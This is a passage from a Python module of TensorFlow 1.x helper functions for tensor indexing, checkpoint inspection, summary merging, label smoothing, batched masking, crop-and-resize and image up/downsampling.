    res = tf.boolean_mask(x, tf.cast(d_masks, tf.bool))
    return res
def select_2thdata_by_index_v2(x,index):
    '''
    handle with the situation which x or index's shape is not fully defined.
    :param x: (Y,M,N,...)
    :param index: (Y)
    :return: (Y,N,...)
    '''
    if not isinstance(x,tf.Tensor):
        x = tf.convert_to_tensor(x)
    if not isinstance(index,tf.Tensor):
        index = tf.convert_to_tensor(index)
    # Same one-hot scatter + boolean_mask strategy as
    # select_2thdata_by_index, but built from dynamic (run-time) shapes.
    d_shape = tf.shape(index)
    x_2th_size = tf.shape(x)[1]
    range = tf.range(0, d_shape[0],dtype=tf.int32)
    range = tf.expand_dims(range, axis=1)
    index = tf.expand_dims(index, axis=1)
    if index.dtype is not tf.int32:
        index = tf.cast(index,tf.int32)
    d_masks = tf.concat(values=[range, index], axis=1)
    d_masks = tf.sparse_to_dense(d_masks, [d_shape[0], x_2th_size], 1)
    res = tf.boolean_mask(x, tf.cast(d_masks, tf.bool))
    return res
def select_2thdata_by_index_v3(x,index):
    '''
    handle with the situation which x or index's first two dim is not fully defined.
    :param x: (Y,M,N,...)
    :param index: (Y)
    :return: (Y,N,...)
    '''
    if not isinstance(x,tf.Tensor):
        x = tf.convert_to_tensor(x)
    if not isinstance(index,tf.Tensor):
        index = tf.convert_to_tensor(index)
    batch_size = x.get_shape().as_list()[0]
    old_shape = tf.shape(x)
    # Flatten the first two axes, then gather row i at offset i*M + index[i].
    new_shape = [-1]+x.get_shape().as_list()[2:]
    x = tf.reshape(x,new_shape)
    res = tf.gather(x, tf.range(old_shape[0], dtype=tf.int32) * old_shape[1]+ index)
    if batch_size is not None:
        # Restore the static batch dimension when it is known.
        res = tf.reshape(res,[batch_size]+new_shape[1:])
    return res
def get_ckpt_file_path(path):
    """Resolve *path* to a usable checkpoint path, or None.

    Accepts a checkpoint directory, an existing file, or a checkpoint
    prefix such as .../data.ckpt-3901 whose shard files exist on disk.
    """
    if tf.gfile.IsDirectory(path):
        try:
            state = tf.train.get_checkpoint_state(path)
        except tf.errors.OutOfRangeError as e:
            print("Cannot restore checkpoint:%s" % e)
            return None
        if state is None:
            print("Error checkpoint state.")
            return None
        return state.model_checkpoint_path
    if tf.gfile.Exists(path):
        return path
    # process the situation of path is a tensorflow check point prefix
    # like ../../tmp/tod_traindatav1/data.ckpt-3901
    dir_path = os.path.dirname(path)
    prefix = os.path.basename(path)
    if ".ckpt" not in prefix:
        return None
    for f in wmlu.recurse_get_filepath_in_dir(dir_path):
        if os.path.basename(f).startswith(prefix):
            return path
    return None
def get_variables_in_ckpt(file_path):
    """List the variable names stored in the checkpoint at `file_path`."""
    reader = pywrap_tensorflow.NewCheckpointReader(file_path)
    return list(reader.get_variable_to_shape_map().keys())

def get_variables_in_ckpt_in_dir(dir_path):
    """List variable names in the checkpoint located under `dir_path`."""
    return get_variables_in_ckpt(get_ckpt_file_path(dir_path))

def get_variables_dict_in_ckpt(file_path):
    """Map variable name -> shape for the checkpoint at `file_path`."""
    reader = pywrap_tensorflow.NewCheckpointReader(file_path)
    return reader.get_variable_to_shape_map()

def get_variables_dict_in_ckpt_in_dir(dir_path):
    """Map variable name -> shape for the checkpoint under `dir_path`.

    Returns None when no checkpoint can be located.
    """
    ckpt_path = get_ckpt_file_path(dir_path)
    if ckpt_path is None:
        return None
    return get_variables_dict_in_ckpt(ckpt_path)
def get_variables_unrestored(restored_values,file_path,exclude_var=None):
    """Return checkpoint variable names that were not restored.

    Names containing any comma-separated substring from `exclude_var` are
    dropped from the result too.
    BUG FIX: the original called list.remove() once per matching exclude
    scope, raising ValueError when a name matched more than one scope.
    """
    remaining = get_variables_in_ckpt(file_path)
    for value in restored_values:
        if value in remaining:
            remaining.remove(value)
    if exclude_var is None:
        return list(remaining)
    scopes = [scope.strip() for scope in exclude_var.split(",")]
    return [v for v in remaining if not any(scope in v for scope in scopes)]
def get_variables_unrestoredv1(restored_values,exclude_var=None):
    """Return global-variable names that are not in `restored_values`.

    Tensor-name suffixes (e.g. ':0') are stripped before comparison; names
    containing any comma-separated substring from `exclude_var` are dropped.
    BUG FIX: the original called list.remove() once per matching exclude
    scope, raising ValueError when a name matched more than one scope.
    """
    all_variables = []
    for v in tf.global_variables():
        name = v.name
        index = name.find(':')
        all_variables.append(name[:index] if index > 0 else name)
    for value in restored_values:
        if value in all_variables:
            all_variables.remove(value)
    if exclude_var is None:
        return list(all_variables)
    scopes = [scope.strip() for scope in exclude_var.split(",")]
    return [v for v in all_variables if not any(scope in v for scope in scopes)]
def int64_feature(value):
    """Wrap an int / int list / int array as a tf.train int64 Feature."""
    if not isinstance(value, (list, np.ndarray)):
        value = [value]
    return tf.train.Feature(int64_list=tf.train.Int64List(value=value))

def floats_feature(value):
    """Wrap a float / float list / float array as a tf.train float Feature."""
    if not isinstance(value, (list, np.ndarray)):
        value = [value]
    return tf.train.Feature(float_list=tf.train.FloatList(value=value))

def bytes_feature(value):
    """Wrap bytes/str (or a list of them) as a tf.train bytes Feature.

    str items are encoded to UTF-8 bytes first.
    """
    if not isinstance(value, list):
        value = [value]
    encoded = [v if isinstance(v, bytes) else v.encode("utf-8") for v in value]
    return tf.train.Feature(bytes_list=tf.train.BytesList(value=encoded))

def bytes_vec_feature(value):
    """Wrap an iterable of bytes as a tf.train bytes Feature (no encoding)."""
    return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
def merge(scopes=None):
    """Merge summaries: all of them, or only those under the given scopes.

    `scopes` is a comma-separated string of scope names.
    """
    if scopes is None:
        return tf.summary.merge_all()
    collected = []
    for scope in (s.strip() for s in scopes.split(',')):
        collected.extend(tf.get_collection(tf.GraphKeys.SUMMARIES, scope))
    return tf.summary.merge(collected)
def merge_exclude(excludes=None):
    """Merge all summaries except those whose names start with an excluded prefix.

    `excludes` is a comma-separated string of name prefixes.
    """
    if excludes is None:
        return tf.summary.merge_all()
    kept = tf.get_collection(tf.GraphKeys.SUMMARIES)
    for prefix in (e.strip() for e in excludes.split(',')):
        kept = [v for v in kept if not v.name.startswith(prefix)]
    return tf.summary.merge(kept)
def join_scopes(scope, subscopes):
    """Prefix each subscope name with `scope` separated by '/'.

    `subscopes` may be a comma-separated string or a list of names.
    """
    if isinstance(subscopes, str):
        names = [part.strip() for part in subscopes.split(",")]
    else:
        assert isinstance(subscopes, list)
        names = subscopes
    return [scope + "/" + n for n in names]
def range_scopes(scope, min, max):
    """Instantiate the %-style pattern `scope` for each index in [min, max)."""
    return [scope % i for i in range(min, max)]
def reshape(tensor, shape, name=None):
    """tf.reshape that maps None / negative entries of a list shape to -1."""
    if isinstance(shape, list):
        def _normalize(dim):
            if isinstance(dim, tf.Tensor):
                return dim
            return dim if (dim is not None and dim >= 0) else -1
        shape = [_normalize(d) for d in shape]
    return tf.reshape(tensor, shape, name)
def check_value_in_ckp(sess,scope):
    """Print summary statistics of the first variable under `scope`.

    Useful for sanity-checking that checkpoint values were actually loaded.
    Returns None (after a warning) when the scope holds no variables.
    """
    candidates = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope)
    logging.info("Check {}".format(scope))
    if not candidates:
        logging.warning(f"No variables in {scope}.")
        return None
    first = candidates[0]
    stats = [tf.reduce_sum(first),
             tf.reduce_sum(tf.abs(first)),
             tf.reduce_min(first),
             tf.reduce_max(first),
             tf.reduce_mean(first)]
    print(sess.run(stats))
def check_value_in_ckpv2(sess,variable):
    """Print summary statistics of a tensor given its graph name."""
    tensor = tf.get_default_graph().get_tensor_by_name(variable)
    stats = [tf.reduce_sum(tensor),
             tf.reduce_sum(tf.abs(tensor)),
             tf.reduce_min(tensor),
             tf.reduce_max(tensor),
             tf.reduce_mean(tensor)]
    print(sess.run(stats))
def unstack(value,axis=0,name="unstack",keep_dim=False):
    """tf.unstack, optionally re-expanding the unstacked axis on each piece."""
    if keep_dim == False:  # noqa: E712 -- preserve original loose comparison
        return tf.unstack(value=value,name=name,axis=axis)
    with tf.name_scope(name):
        pieces = tf.unstack(value=value, axis=axis)
        return [tf.expand_dims(piece, axis=axis) for piece in pieces]
def image_zero_mean_unit_range(inputs):
    """Map image values from [0, 255] to [-1, 1]."""
    scaled = tf.to_float(inputs) * (2.0 / 255.0)
    return scaled - 1.0
def mean_pixel(model_variant=None):
    """Return the mean pixel value for the given preprocessing variant.

    For model_variant=None the legacy per-channel mean (_MEAN_RGB) is
    returned (subtract-imagenet-mean preprocessing). Any named variant
    uses zero-mean/unit-range preprocessing, for which padded regions map
    to [127.5, 127.5, 127.5].

    Args:
        model_variant: Model variant (string) for feature extraction, or
            None for backwards compatibility.

    Returns:
        Mean pixel value as a 3-element list.
    """
    return _MEAN_RGB if model_variant is None else [127.5, 127.5, 127.5]
def num_elements(input):
    """Element count of `input`: a python int when the static shape is
    fully known, otherwise a scalar tensor computed at run time."""
    static_shape = input.get_shape()
    if static_shape.is_fully_defined():
        return static_shape.num_elements()
    return tf.reduce_prod(tf.shape(input))
'''
input: [batch_size,D,H,W,C]
size:[ND,NH,NW]
'''
def resize_biliner3d(input,size):
    """Bilinear resize of a volume.

    input: [batch_size, D, H, W, C]; size: (ND, NH, NW).
    Implemented as two 2-D bilinear resizes: first over (H, W) with depth
    folded into the batch axis, then over (D, H) with width folded into
    the batch axis.
    """
    shape = tf.shape(input)
    # Pass 1: fold D into batch and resize (H, W) -> (NH, NW).
    input = tf.reshape(input,[shape[0]*shape[1],shape[2],shape[3],shape[4]])
    input = tf.image.resize_bilinear(input, size[1:], align_corners=True)
    shape = [shape[0],shape[1],size[1],size[2],shape[4]]
    input = tf.reshape(input,shape)
    # Pass 2: move W next to batch, fold it in, resize (D, NH) -> (ND, NH),
    # then undo the transpose.
    input = tf.transpose(input,perm=[0,3,1,2,4])
    input = tf.reshape(input,[shape[0]*shape[3],shape[1],shape[2],shape[4]])
    input = tf.image.resize_bilinear(input, size[:2], align_corners=True)
    shape = [shape[0],size[0],size[1],size[2],shape[4]]
    input = tf.reshape(input,[shape[0],shape[3],shape[1],shape[2],shape[4]])
    input = tf.transpose(input,perm=[0,2,3,1,4])
    return input
def resize_depth(input,depth):
    """Resize only the depth axis of a volume [batch, D, H, W, C] to `depth`.

    Folds W into the batch axis and runs one bilinear resize over (D, H),
    keeping H at its original size; restores the input dtype afterwards.
    """
    shape = tf.shape(input)
    old_type = input.dtype
    # Move W next to batch and fold it in: [batch*W, D, H, C].
    input = tf.transpose(input,perm=[0,3,1,2,4])
    input = tf.reshape(input,[shape[0]*shape[3],shape[1],shape[2],shape[4]])
    input = tf.image.resize_bilinear(input, size=(depth,shape[2]), align_corners=True)
    shape = [shape[0],depth,shape[2],shape[3],shape[4]]
    input = tf.reshape(input,[shape[0],shape[3],shape[1],shape[2],shape[4]])
    input = tf.transpose(input,perm=[0,2,3,1,4])
    # resize_bilinear returns floats; cast back when the input was not float.
    if old_type != input.dtype:
        input = tf.cast(input,old_type)
    return input
def resize_nearest_neighbor3d(input,size):
    """Nearest-neighbour resize of a volume.

    input: [batch_size, D, H, W, C]; size: (ND, NH, NW).
    Same two-pass folding strategy as resize_biliner3d, with
    nearest-neighbour interpolation.
    """
    shape = tf.shape(input)
    # Pass 1: fold D into batch and resize (H, W) -> (NH, NW).
    input = tf.reshape(input,[shape[0]*shape[1],shape[2],shape[3],shape[4]])
    input = tf.image.resize_nearest_neighbor(input, size[1:], align_corners=True)
    shape = [shape[0],shape[1],size[1],size[2],shape[4]]
    input = tf.reshape(input,shape)
    # Pass 2: fold W into batch, resize (D, NH) -> (ND, NH), undo transpose.
    input = tf.transpose(input,perm=[0,3,1,2,4])
    input = tf.reshape(input,[shape[0]*shape[3],shape[1],shape[2],shape[4]])
    input = tf.image.resize_nearest_neighbor(input, size[:2], align_corners=True)
    shape = [shape[0],size[0],size[1],size[2],shape[4]]
    input = tf.reshape(input,[shape[0],shape[3],shape[1],shape[2],shape[4]])
    input = tf.transpose(input,perm=[0,2,3,1,4])
    return input
'''
sparse_indices: [X,Y,...,M,1], 包含了应该设置为sparse_value的index, 格式与top_k返回的格式相同
如[[0]
[1],
[0],
...
]
res:
[X,Y,....,M,dim_size]
'''
def sparse_to_dense(sparse_indices, dim_size, sparse_value, default_value=0):
    """Dense one-hot-style expansion of per-position indices.

    sparse_indices: [..., 1] of positions (same layout as tf.nn.top_k
    output). Returns a tensor of shape sparse_indices.shape[:-1] +
    [dim_size] holding `sparse_value` at each listed position and
    `default_value` everywhere else.
    """
    old_shape = tf.shape(sparse_indices)
    first_dim_size = tf.reduce_prod(old_shape)
    out_shape = tf.convert_to_tensor([tf.reduce_prod(tf.shape(sparse_indices)),dim_size])
    # Flatten to [N] and pair each index with its row id so the scatter
    # targets a 2-D [N, dim_size] grid.
    sparse_indices = tf.reshape(sparse_indices,[-1])
    sparse_indices = tf.stack([tf.range(first_dim_size),sparse_indices],axis=1)
    res = tf.sparse_to_dense(sparse_indices,output_shape=out_shape,sparse_values=sparse_value,default_value=default_value)
    res = tf.reshape(res,tf.concat([old_shape[:-1],[dim_size]],axis=0))
    return res
def label_smooth(labels,num_classes,smoothed_value=0.9):
    '''
    Label smoothing: build one-hot-like rows with smoothed_value at the
    true class and the residual mass spread over the other classes.

    :param labels: shape=[batch_size]
    :param num_classes: shape=()
    :param smoothed_value: shape=()
    :return: shape-[batch_size,num_classes]
    '''
    if labels.get_shape().ndims != 1:
        raise ValueError("Labels's should be one dimensional.")
    if not isinstance(num_classes,int):
        raise ValueError("num_classes should be a integer")
    if not isinstance(smoothed_value,float):
        raise ValueError("smoothed_value should be a float")
    # Spread the residual probability mass evenly over the other classes.
    default_value = (1.0-smoothed_value)/(num_classes-1)
    res = tf.ones(shape=[tf.shape(labels)[0],num_classes],dtype=tf.float32)*default_value
    # Overwrite each row's true-label slot with the smoothed value.
    res = tf.map_fn(lambda x:set_value(x[0],v=tf.constant([smoothed_value]),index=x[1]),elems=(res,labels),
                    dtype=tf.float32,back_prop=False)
    return res
def label_smoothv1(labels,num_classes,smoothed_value=0.9):
    '''
    Variant of label_smooth: the leftover mass (1 - smoothed_value) is put
    entirely on class 0 instead of being spread over all other classes.

    :param labels: shape=[batch_size]
    :param num_classes: shape=()
    :param smoothed_value: shape=()
    :return: shape-[batch_size,num_classes]
    '''
    if labels.get_shape().ndims != 1:
        raise ValueError("Labels's should be one dimensional.")
    if not isinstance(num_classes,int):
        raise ValueError("num_classes should be a integer")
    if not isinstance(smoothed_value,float):
        raise ValueError("smoothed_value should be a float")
    default_value = (1.0-smoothed_value)
    def fn(index):
        # Sum of two single-slot rows: leftover mass at slot 0 plus the
        # smoothed value at the true-label slot.
        data = tf.zeros(shape=[num_classes],dtype=tf.float32)
        data0 = set_value(data,v=tf.constant([default_value]),index=tf.constant(0))
        data1 = set_value(data,v=tf.constant([smoothed_value]),index=index)
        return tf.add(data0,data1)
    res_data = tf.map_fn(fn,elems=(labels),
                         dtype=tf.float32,back_prop=False)
    return res_data
def split(datas,num):
    """tf.split applied to one tensor, or to each tensor in a sequence."""
    if isinstance(datas, tf.Tensor):
        return tf.split(datas, num_or_size_splits=num)
    return [tf.split(data, num_or_size_splits=num) for data in datas]
def fixed_padding(inputs, kernel_size, rate=1):
    """Pads the input along the spatial dimensions independently of input size.

    Args:
        inputs: A tensor of size [batch, height_in, width_in, channels].
        kernel_size: The kernel of the following conv2d/max_pool2d op.
            Should be a positive integer.
        rate: An integer, rate for atrous convolution.

    Returns:
        A tensor of size [batch, height_out, width_out, channels], zero
        padded on both spatial axes (unchanged when the effective kernel
        size is 1).
    """
    effective_kernel = kernel_size + (kernel_size - 1) * (rate - 1)
    pad_total = effective_kernel - 1
    pad_before = pad_total // 2
    pad_after = pad_total - pad_before
    return tf.pad(inputs, [[0, 0], [pad_before, pad_after],
                           [pad_before, pad_after], [0, 0]])
'''
mask0:[X]
mask1:[Y]
return:
mask:[X]
'''
def merge_mask(mask0,mask1):
    """Compose two boolean masks: mask1 selects among mask0's True entries.

    mask0: [X]; mask1: [Y] where Y equals the number of True entries in
    mask0. Returns an [X] mask that is True only where mask0 is True and
    the corresponding entry of mask1 is also True.
    """
    indices = tf.range(tf.reshape(tf.shape(mask0),()))
    indices = tf.boolean_mask(indices,mask0)
    indices = tf.boolean_mask(indices,mask1)
    res = tf.sparse_to_dense(sparse_indices=indices,output_shape=tf.shape(mask0),sparse_values=True,default_value=False)
    return res
def assert_equal(v,values,name=None):
    """Return `v` gated on runtime checks that all `values` are equal."""
    checks = [tf.assert_equal(values[0], other, name=name)
              for other in values[1:]]
    with tf.control_dependencies(checks):
        return tf.identity(v)

def assert_shape_equal(v,values,name=None):
    """Return `v` gated on runtime checks that all `values` share one shape."""
    return assert_equal(v, [tf.shape(value) for value in values], name=name)
'''
image:[batch_size,H,W,C]/[H,W,C]
bboxes:[batch_size,X,4]/[X,4] (ymin,xmin,ymax,xmax) in [0,1]
length::[batch_size]
size:(H,W)
output:
[box_nr,size[0],size[1],C]
'''
def tf_crop_and_resizev2(image,bboxes,size,lengths=None):
    """Crop boxes out of images and resize every crop to `size`.

    image: [batch, H, W, C] or [H, W, C]; bboxes: [batch, X, 4] or [X, 4]
    with (ymin, xmin, ymax, xmax) in [0, 1]; lengths: optional [batch]
    counts of valid boxes per image. Returns
    [total_box_nr, size[0], size[1], C].
    """
    if len(image.get_shape())==3:
        assert len(bboxes.get_shape())==2, "error box shape"
        image = tf.expand_dims(image,axis=0)
        bboxes = tf.expand_dims(bboxes,axis=0)
    assert len(image.get_shape())==4,"error image shape"
    assert len(bboxes.get_shape())==3,"error bboxes shape"
    B,H,W,C = btf.combined_static_and_dynamic_shape(image)
    _,X,_ = btf.combined_static_and_dynamic_shape(bboxes)
    # Flatten boxes and record which batch image each box belongs to.
    bboxes = tf.reshape(bboxes,[B*X,4])
    index = tf.range(B)
    index = tf.tile(tf.reshape(index,[B,1]),[1,X])
    index = tf.reshape(index,[-1])
    if lengths is not None:
        # Drop padded (invalid) boxes beyond each image's length.
        mask = tf.sequence_mask(lengths,maxlen=X)
        mask = tf.reshape(mask,[-1])
        bboxes = tf.boolean_mask(bboxes,mask)
        index = tf.boolean_mask(index,mask)
    images = tf.image.crop_and_resize(image,bboxes,index,size)
    return images
'''
image:[batch_size,X,H,W,C]/[X,H,W,C]
bboxes:[batch_size,X,4]/[X,4] (ymin,xmin,ymax,xmax) in [0,1]
size:(H,W)
lengths: [batch_size]
output:
[batch_size,box_nr,size[0],size[1],C]/ [box_nr,size[0],size[1],C]
or [Y,size[0],size[1],C] if lengths is not None
'''
def tf_crop_and_resize(image,bboxes,size,lengths=None):
    """Crop-and-resize supporting per-image box lists.

    image: [batch, X, H, W, C] or [X, H, W, C] (one image per box); bboxes
    matches, with a leading [batch] when present; size: (H, W); lengths:
    optional [batch] valid-box counts. Returns crops, batched unless
    `lengths` filters them down to a flat [Y, size[0], size[1], C].
    """
    if len(image.get_shape()) == 4:
        # Single batch entry: add a batch axis, crop, then squeeze it away.
        image = tf.expand_dims(image,axis=0)
        bboxes = tf.expand_dims(bboxes,axis=0)
        return tf.squeeze(batch_tf_crop_and_resize(image,bboxes,size),axis=0)
    elif len(image.get_shape()) == 5:
        res = batch_tf_crop_and_resize(image,bboxes,size)
        if lengths is not None:
            # Keep only the first lengths[i] crops of each batch entry.
            B,X,H,W,C = btf.combined_static_and_dynamic_shape(image)
            mask = tf.reshape(tf.sequence_mask(lengths,X),[-1])
            res = tf.reshape(res,[-1,size[0],size[1],C])
            res = tf.boolean_mask(res,mask)
        return res
    else:
        raise Exception("Error image ndims.")
'''
image:[batch_size,X,H,W,C]
bboxes:[batch_size,X,4] (ymin,xmin,ymax,xmax) in [0,1]
size:(H,W)
output:
[batch_size,box_nr,size[0],size[1],C]
'''
def batch_tf_crop_and_resize(image,bboxes,size):
    """Crop every box of every image and resize the crops to `size`.

    image: [batch, X, H, W, C], one image per box row; bboxes:
    [batch, X, 4] as (ymin, xmin, ymax, xmax) in [0, 1].
    Returns [batch, X, size[0], size[1], C].
    """
    img_shape = btf.combined_static_and_dynamic_shape(image)
    batch_size = img_shape[0]
    box_nr = img_shape[1]
    # Fold the per-image box axis into the batch axis so crop_and_resize
    # sees one image per box.
    new_img_shape = [img_shape[0]*img_shape[1]]+img_shape[2:]
    bboxes_shape = btf.combined_static_and_dynamic_shape(bboxes)
    new_bboxes_shape = [bboxes_shape[0]*bboxes_shape[1],4]
    image = reshape(image,new_img_shape)
    bboxes = reshape(bboxes,new_bboxes_shape)
    box_ind = tf.range(0,tf.reduce_prod(tf.shape(bboxes)[0]),dtype=tf.int32)
    images = tf.image.crop_and_resize(image,bboxes,box_ind,size)
    shape = btf.combined_static_and_dynamic_shape(images)
    # Restore the [batch, box] leading axes.
    images = reshape(images,[batch_size,box_nr]+shape[1:])
    return images
# Re-exported alias for backwards compatibility.
mask_to_indices = btf.mask_to_indices

def indices_to_mask(indices,size):
    """Build a boolean mask of length `size` from an index vector.

    Returns (mask, perm): mask is True at every listed index, and perm is
    the permutation of positions that orders `indices` ascending (a
    descending top_k over the whole vector, reversed).
    """
    mask = tf.cast(indices_to_dense_vector(indices,size,1,default_value=0,dtype=tf.int32),tf.bool)
    _,ind = tf.nn.top_k(indices,tf.reshape(tf.shape(indices),()))
    ind = tf.reverse(ind,axis=[0])
    return mask,ind
def batch_indices_to_mask(indices,lens,size):
    """Per-row indices_to_mask with fixed-width padding.

    indices: [batch, X]; lens: [batch] valid counts per row; size: output
    mask length. Returns (masks, padded sort permutations) per row.
    """
    if indices.get_shape().is_fully_defined():
        ind_size = indices.get_shape().as_list()[1]
    else:
        ind_size = tf.shape(indices)[1]
    def fn(ind,l):
        ind = ind[:l]
        mask,ind = indices_to_mask(ind,size)
        # Pad the permutation back to width X so map_fn can stack rows.
        ind = tf.pad(ind,tf.convert_to_tensor([[0,ind_size-l]]))
        return mask,ind
    return tf.map_fn(lambda x:fn(x[0],x[1]),elems=(indices,lens),dtype=(tf.bool,tf.int32),back_prop=False)
'''
每一个element分别执行boolean mask并pad到size大小
data:[N,X,...]
mask:[N,X]
size:()
return:
[N,size]
'''
def batch_boolean_mask(data,mask,size,return_length=False,scope=None):
    # Apply boolean_mask to each batch element and zero-pad each result to
    # `size` (per the module-level doc above: data [N,X,...], mask [N,X],
    # output [N,size,...]).
    # With return_length=True additionally returns the per-row count of kept
    # elements, shape [N].
    with tf.name_scope(scope,default_name="batch_boolean_mask"):
        if not isinstance(data,tf.Tensor):
            data = tf.convert_to_tensor(data)
        def fn(d,m):
            d = tf.boolean_mask(d,m,name="boolean_mask_on_single_data")
            # Pad only the leading axis; trailing axes keep their size.
            padding = [[0,size-tf.shape(d)[0]]]
            if d.get_shape().ndims>1:
                padding = padding+[[0,0]]*(d.get_shape().ndims-1)
            d = tf.pad(d,padding)
            return d
        data = tf.map_fn(lambda x:fn(x[0],x[1]),elems=(data,mask),dtype=(data.dtype),back_prop=False)
        if return_length:
            return data,tf.reduce_sum(tf.cast(mask,tf.int32),axis=-1,keepdims=False)
        else:
            return data
'''
每一个element分别执行boolean mask并 concat在一起
data:[N,X]
mask:[N,X]
N must be full defined
return:
[Y]
'''
def batch_boolean_maskv2(data, mask):
    """Boolean-mask every batch element and concatenate the survivors.

    data: [N, X, ...]; mask: [N, X]; N must be statically known.
    Returns a [Y, ...] tensor where Y is the total number of True entries.
    """
    if not isinstance(data, tf.Tensor):
        data = tf.convert_to_tensor(data)
    batch = btf.combined_static_and_dynamic_shape(data)[0]
    kept = [tf.boolean_mask(data[i], mask[i]) for i in range(batch)]
    return tf.concat(kept, axis=0)
'''
每一个element先用indices gather再执行boolean mask并 concat在一起
data:[M,X]
indices:[N,X]
mask:[N,X]
N must be full defined
return:
[Y]
'''
def batch_boolean_maskv3(data,indices,mask):
    # Per the module-level doc above: for each batch element, first keep the
    # entries of indices[i] where mask[i] is True, then gather those indices
    # out of data[i]; finally concatenate all batches into one [Y,...] tensor.
    # The leading dim of `data` must be statically known (Python loop below).
    if not isinstance(data,tf.Tensor):
        data = tf.convert_to_tensor(data)
    res = []
    shape = btf.combined_static_and_dynamic_shape(data)
    for i in range(shape[0]):
        indx = tf.boolean_mask(indices[i],mask[i])
        d = tf.gather(data[i],indx)
        res.append(d)
    return tf.concat(res,axis=0)
def Print(data,*inputs,**kwargs):
    # Wrap `data` so that evaluating it also executes tf.print(*inputs):
    # the control dependency forces the print op to run before the identity.
    op = tf.print(*inputs,**kwargs)
    with tf.control_dependencies([op]):
        return tf.identity(data)
def print_tensor_shape(input_,data,name=None,summarize=100):
    # Debug helper: print the dynamic shapes of every tensor in `data` each
    # time `input_` is evaluated. Optionally prefix the output with `name`.
    # NOTE: uses the deprecated TF1 tf.Print op.
    data = [tf.shape(x) for x in data]
    if name is not None:
        data = [tf.constant(name+": ")]+data
    return tf.Print(input_,data,summarize=summarize)
'''
indicator:[X],tf.bool
return:
[x]:tf.bool
'''
def subsample_indicator(indicator, num_samples):
    # Randomly keep at most `num_samples` of the True entries of `indicator`
    # (per the module doc above: indicator is [X] tf.bool; the return value
    # is a [X] tf.bool mask of the kept entries).
    with tf.name_scope("sample_indicator"):
        indicator_shape = btf.combined_static_and_dynamic_shape(indicator)
        indices = tf.where(indicator)          # positions of the True entries
        indices = tf.random_shuffle(indices)   # randomize before truncating
        indices = tf.reshape(indices, [-1])
        if isinstance(num_samples,tf.Tensor) and num_samples.dtype != tf.int32:
            num_samples = tf.cast(num_samples,tf.int32)
        # Never ask for more samples than there are True entries.
        num_samples = tf.minimum(tf.size(indices), num_samples)
        selected_indices = tf.slice(indices, [0], tf.reshape(num_samples, [1]))
        # Scatter the surviving indices back into a dense 0/1 vector.
        selected_indicator = indices_to_dense_vector(selected_indices,
                                                     indicator_shape[0])
        selected_indicator = tf.reshape(selected_indicator,indicator_shape)
        return tf.equal(selected_indicator, 1)
def nearest_neighbor_upsampling(input_tensor, scale=None, height_scale=None,
                                width_scale=None, scope=None):
    """Nearest neighbor upsampling implementation.
    Nearest neighbor upsampling function that maps input tensor with shape
    [batch_size, height, width, channels] to [batch_size, height * scale
    , width * scale, channels]. This implementation only uses reshape and
    broadcasting to make it TPU compatible.
    Args:
      input_tensor: A float32 tensor of size [batch, height_in, width_in,
        channels].
      scale: An integer multiple to scale resolution of input data in both height
        and width dimensions.
      height_scale: An integer multiple to scale the height of input image. This
        option when provided overrides `scale` option.
      width_scale: An integer multiple to scale the width of input image. This
        option when provided overrides `scale` option.
      scope: optional name scope for the created ops.
    Returns:
      data_up: A float32 tensor of size
        [batch, height_in*scale, width_in*scale, channels].
    Raises:
      ValueError: If both scale and height_scale or if both scale and width_scale
        are None.
    """
    if not scale and (height_scale is None or width_scale is None):
        raise ValueError('Provide either `scale` or `height_scale` and'
                         ' `width_scale`.')
    with tf.name_scope(scope,'nearest_neighbor_upsampling'):
        h_scale = scale if height_scale is None else height_scale
        w_scale = scale if width_scale is None else width_scale
        (batch_size, height, width,
         channels) = combined_static_and_dynamic_shape(input_tensor)
        # Multiplying by a ones tensor broadcasts each pixel into an
        # h_scale x w_scale block; the final reshape merges the blocks back
        # into the spatial dims.
        output_tensor = tf.reshape(
            input_tensor, [batch_size, height, 1, width, 1, channels]) * tf.ones(
            [1, 1, h_scale, 1, w_scale, 1], dtype=input_tensor.dtype)
        return tf.reshape(output_tensor,
                          [batch_size, height * h_scale, width * w_scale, channels])
def nearest_neighbor_downsampling(input_tensor, scale=None, height_scale=None,
                                  width_scale=None):
    """Nearest-neighbor downsampling by integer factors.

    Reshapes [batch, H, W, C] into blocks of h_scale x w_scale and keeps the
    top-left sample of every block, giving [batch, H//h_scale, W//w_scale, C].
    Assumes H and W are divisible by the scales (TODO confirm callers
    guarantee this; the reshape fails otherwise).
    """
    if not scale and (height_scale is None or width_scale is None):
        raise ValueError('Provide either `scale` or `height_scale` and'
                         ' `width_scale`.')
    with tf.name_scope('nearest_neighbor_downsampling'):
        h_scale = scale if height_scale is None else height_scale
        w_scale = scale if width_scale is None else width_scale
        (batch_size, height, width,
         channels) = combined_static_and_dynamic_shape(input_tensor)
        output_tensor = tf.reshape(
            input_tensor, [batch_size, height//h_scale, h_scale, width//w_scale, w_scale, channels])
        # Index (0, 0) of each block -> one sample per scale cell.
        return output_tensor[:,:,0,:,0,:]
def channel_upsample(input_tensor,scale=None,height_scale=None,width_scale=None):
    """Trade channels for spatial resolution (depth-to-space-style shuffle).

    Splits the channel axis into (h_scale, w_scale, out_channels) and
    redistributes those factors into the height/width axes:
    [B, H, W, C] -> [B, H*h_scale, W*w_scale, C/(h_scale*w_scale)].
    Assumes C is divisible by h_scale*w_scale.
    """
    if not scale and (height_scale is None or width_scale is None):
        raise ValueError('Provide either `scale` or `height_scale` and'
                         ' `width_scale`.')
    with tf.name_scope('channel_upsampling'):
        h_scale = scale if height_scale is None else height_scale
        w_scale = scale if width_scale is None else width_scale
        (batch_size, height, width,
         channels) = combined_static_and_dynamic_shape(input_tensor)
        out_channels = channels//(h_scale*w_scale)
        output_tensor = tf.reshape(
            input_tensor, [batch_size, height, width, h_scale,w_scale,out_channels])
        # Interleave: (B, H, h_scale, W, w_scale, C_out) so that merging
        # adjacent axes yields the upscaled spatial dims.
        output_tensor = tf.transpose(output_tensor,[0,1,3,2,4,5])
        output_tensor = tf.reshape(output_tensor,[batch_size,height*h_scale,width*w_scale,out_channels])
        return output_tensor
def select_image_by_mask(image,mask):
    '''
    Select (and possibly repeat) batch images according to a boolean mask.
    :param image: [batch_size,H,W,C]
    :param mask: [batch_size,N], tf.bool
    :return:
    [X,H,W,C], X = tf.reduce_sum(mask)
    '''
    with tf.name_scope("select_image_by_mask"):
        batch_size,H,W,C = combined_static_and_dynamic_shape(image)
        # Broadcast row index b over all N columns, then keep only the
        # positions where mask is True; image b is gathered once per True
